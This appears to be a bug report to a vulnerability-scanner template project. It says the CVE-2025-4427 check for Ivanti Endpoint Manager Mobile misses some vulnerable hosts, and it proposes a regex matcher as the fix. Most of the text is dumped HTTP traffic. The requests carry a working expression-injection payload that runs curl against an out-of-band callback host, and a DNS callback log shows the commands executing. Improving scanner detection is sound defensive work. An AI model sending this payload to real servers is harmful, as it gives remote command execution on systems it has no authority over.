[FALSE-NEGATIVE] CVE-2025-4427 - Ivanti Endpoint Manager Mobile #12209
Description
Template IDs or paths
- http/cves/2025/CVE-2025-4427.yamlEnvironment
- OS: Sequoia 15.4.1
- Nuclei: v3.4.4
- Nuclei-Templates: v10.2.2Steps To Reproduce
Certain hosts running vulnerable versions of epmm respond with the process created object instead of the expected process id which are not detected by the current template. The vulnerable versions execute code which can be seen on the interact.sh client. I have attached the json response below
Relevant dumped responses
[INF] [CVE-2025-4427] Dumped HTTP request for https://DOMAIN/mifs/rs/api/v2/featureusage_history?adminDeviceSpaceId=131&format=%24%7b''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(''.getClass().forName('java.lang.Runtime')).exec('curl%20d0t3e3kv3bcgh8jqo7s0z134od1hmyeaj.oast.pro')%7d
GET /mifs/rs/api/v2/featureusage_history?adminDeviceSpaceId=131&format=%24%7b''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(''.getClass().forName('java.lang.Runtime')).exec('curl%20d0t3e3kv3bcgh8jqo7s0z134od1hmyeaj.oast.pro')%7d HTTP/1.1
Host: DOMAIN
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15
Connection: close
Accept-Encoding: gzip
[DBG] [CVE-2025-4427] Dumped HTTP response https://DOMAIN/mifs/rs/api/v2/featureusage_history?adminDeviceSpaceId=131&format=%24%7b''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(''.getClass().forName('java.lang.Runtime')).exec('curl%20d0t3e3kv3bcgh8jqo7s0z134od1hmyeaj.oast.pro')%7d
HTTP/1.1 400
Connection: close
Content-Length: 313
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: application/json;charset=UTF-8
Date: Fri, 30 May 2025 22:54:07 GMT
Expires: Tue, 20 May 2025 22:54:07 GMT
Pragma: no-cache
Referrer-Policy: strict-origin-when-cross-origin
Server: server
Strict-Transport-Security: max-age=31536000 ; includeSubDomains
X-Content-Type-Options: nosniff
X-Frame-Options: SameOrigin
X-Xss-Protection: 1; mode=block
{"messages":[{"type":"Error","messageKey":"com.mobileiron.vsp.messages.validation.global.error","localizedMessage":"Format 'java.lang.UNIXProcess@6dbfc773' is invalid. Valid formats are 'json', 'csv'.","messageParameters":["Format 'java.lang.UNIXProcess@6dbfc773' is invalid. Valid formats are 'json', 'csv'."]}]}
[INF] [CVE-2025-4427] Dumped HTTP request for https://DOMAIN/mifs/rs/api/v2/featureusage?adminDeviceSpaceId=131&format=%24%7b''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(''.getClass().forName('java.lang.Runtime')).exec('curl%20d0t3e3kv3bcgh8jqo7s04dqsdtjchmifk.oast.pro')%7d
GET /mifs/rs/api/v2/featureusage?adminDeviceSpaceId=131&format=%24%7b''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(''.getClass().forName('java.lang.Runtime')).exec('curl%20d0t3e3kv3bcgh8jqo7s04dqsdtjchmifk.oast.pro')%7d HTTP/1.1
Host: DOMAIN
User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip
[DBG] [CVE-2025-4427] Dumped HTTP response https://DOMAIN/mifs/rs/api/v2/featureusage?adminDeviceSpaceId=131&format=%24%7b''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(''.getClass().forName('java.lang.Runtime')).exec('curl%20d0t3e3kv3bcgh8jqo7s04dqsdtjchmifk.oast.pro')%7d
HTTP/1.1 400
Connection: close
Content-Length: 313
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: application/json;charset=UTF-8
Date: Fri, 30 May 2025 22:54:08 GMT
Expires: Tue, 20 May 2025 22:54:08 GMT
Pragma: no-cache
Referrer-Policy: strict-origin-when-cross-origin
Server: server
Strict-Transport-Security: max-age=31536000 ; includeSubDomains
X-Content-Type-Options: nosniff
X-Frame-Options: SameOrigin
X-Xss-Protection: 1; mode=block
{"messages":[{"type":"Error","messageKey":"com.mobileiron.vsp.messages.validation.global.error","localizedMessage":"Format 'java.lang.UNIXProcess@279dbc51' is invalid. Valid formats are 'json', 'csv'.","messageParameters":["Format 'java.lang.UNIXProcess@279dbc51' is invalid. Valid formats are 'json', 'csv'."]}]}
[0:00:05] | Templates: 1 | Hosts: 1 | RPS: 0 | Matched: 0 | Errors: 0 | Requests: 2/2 (100%)
[d0t3e3kv3bcgh8jqo7s04dqsdtjchmifk] Received DNS interaction from X.X.X.X at 2025-05-30 22:54:08
------------
DNS Request
------------
;; opcode: QUERY, status: NOERROR, id: 3031
;; flags:; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version 0; flags: do; udp: 4000
;; QUESTION SECTION:
;d0t3e3kv3bcgh8jqo7s04dqsdtjchmifk.oast.pro. IN AAAA
------------
DNS Response
------------
;; opcode: QUERY, status: NOERROR, id: 3031
;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2
;; QUESTION SECTION:
;d0t3e3kv3bcgh8jqo7s04dqsdtjchmifk.oast.pro. IN AAAA
;; ANSWER SECTION:
d0t3e3kv3bcgh8jqo7s04dqsdtjchmifk.oast.pro. 3600 IN A X.X.X.X
;; AUTHORITY SECTION:
d0t3e3kv3bcgh8jqo7s04dqsdtjchmifk.oast.pro. 3600 IN NS ns1.oast.pro.
d0t3e3kv3bcgh8jqo7s04dqsdtjchmifk.oast.pro. 3600 IN NS ns2.oast.pro.
;; ADDITIONAL SECTION:
ns1.oast.pro. 3600 IN A X.X.X.X
ns2.oast.pro. 3600 IN A X.X.X.XAnything else?
I was able to get the nuclei template working by modifying it with a regex to match the process creation object, since everything after the @ is random generated.
matchers:
- type: word
part: body
words:
- "Format 'Process[pid="
- "localizedMessage"
condition: or
- type: regex
part: body
regex:
- "Format 'java\\.lang\\.UNIXProcess@[0-9a-f]+'"
condition: and